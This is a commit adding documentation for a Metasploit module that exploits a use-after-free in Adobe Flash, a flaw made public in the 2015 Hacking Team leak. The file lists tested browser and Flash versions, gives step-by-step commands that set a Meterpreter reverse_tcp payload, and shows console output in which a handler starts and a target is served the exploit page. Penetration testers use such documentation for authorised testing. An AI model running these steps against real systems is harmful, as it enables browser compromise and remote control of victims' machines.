Documentation on adobe_flash_hacking_team_uaf

2017-03-25 03:54:17 +05:30 · 2017-03-25 03:54:17 +05:30 · 4b36a42eff
parent 91c7a1bc34
commit 4b36a42eff
1 changed files with 75 additions and 0 deletions
--- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md
+++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md
@ -0,0 +1,75 @@
+##Description
+
+This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on:
+Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
+Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
+Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
+Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and
+Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
+
+
+
+
+
+## Verification Steps
+
+
+
+1. Do: ```use exploit/multi/browser/adobe_flash_hacking_team_uaf```
+2. Do: ```set payload windows/meterpreter/reverse_tcp```
+2. Do: ```set LHOST [IP]```
+3. Do: ```set SRVHOST [IP]```
+3. Do: ```set URIPATH / [PATH]```
+4. Do: ```run```
+
+## Sample Output
+
+```
+msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf
+msf exploit(adobe_flash_hacking_team_uaf) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(adobe_flash_hacking_team_uaf) > set lhost 172.16.178.160
+lhost => 172.16.178.160
+msf exploit(adobe_flash_hacking_team_uaf) > set srvhost 172.16.178.160
+srvhost => 172.16.178.160
+msf exploit(adobe_flash_hacking_team_uaf) > set uripath /
+uripath => /
+msf exploit(adobe_flash_hacking_team_uaf) > show options
+
+Module options (exploit/multi/browser/adobe_flash_hacking_team_uaf):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Retries  true             no        Allow the browser to retry the module
+   SRVHOST  172.16.178.160   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL for incoming connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH  /                no        The URI to use for this exploit (default is random)
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.16.178.160   yes       The listen address
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows
+
+
+msf exploit(adobe_flash_hacking_team_uaf) > exploit
+[*] Exploit running as background job.
+
+[*] Started reverse TCP handler on 172.16.178.160:4444 
+[*] Using URL: http://172.16.178.160:8080/
+[*] Server started.
+msf exploit(adobe_flash_hacking_team_uaf) > [*] 172.16.178.203   adobe_flash_hacking_team_uaf - Gathering target information for 172.16.178.203
+[*] 172.16.178.203   adobe_flash_hacking_team_uaf - Sending HTML response to 172.16.178.203
+```